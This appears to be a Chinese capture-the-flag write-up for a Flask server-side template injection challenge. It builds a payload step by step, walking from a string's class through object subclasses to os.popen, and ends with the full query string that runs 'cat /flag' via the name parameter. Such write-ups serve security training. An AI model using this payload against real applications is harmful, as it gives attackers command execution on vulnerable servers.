提示“名字就是考点”
传参点name
获取字符串的类:
"".__class__得到
str的类对象。获取基类:
"".__class__.__bases__[0]这会得到
str类的基类列表,其中第一个元素是object类。获取
object类的所有子类:"".__class__.__bases__[0].__subclasses__()返回一个包含Python中所有类的列表,这些类都是直接或间接从
object继承的。选择特定的子类:
"".__class__.__bases__[0].__subclasses__()[132]选择了列表中的第133个元素(因为索引是从0开始的)。
访问
Popen类的初始化方法的全局变量:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__通过访问
Popen类的__init__方法的__globals__属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。调用
popen:"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']从全局变量字典中获取名为
popen的变量执行系统命令:
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')使用
Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。读取命令输出:
"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()调用
read()方法来读取Popen对象的输出,即cat /flag命令的输出。?name="".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()
![[pasecactf_2019]flask_<span style='color:red;'>ssti</span> proc <span style='color:red;'>ssti</span> config](https://img-blog.csdnimg.cn/direct/80b865e54c594f63a577eadac1e3c781.png)
![BUUCTF-Real-[Flask]<span style='color:red;'>SSTI</span>](https://img-blog.csdnimg.cn/direct/5fb10bf0145f48f0b514881dfb04b04a.png)
![[Flask]<span style='color:red;'>SSTI</span>1 buuctf](https://img-blog.csdnimg.cn/direct/49dbcd04b8d84b7ab51c5f1015cf3642.png)
![Linux基础命令[19]-id](https://img-blog.csdnimg.cn/direct/f9f4ceeb8ff543b7a18458457e4c94ce.png)
![[scikit-learn] 第一章 初识scikit-learn及内置数据集介绍](https://img-blog.csdnimg.cn/direct/d47a0d7584844497aece7e34bea0e60c.jpeg)
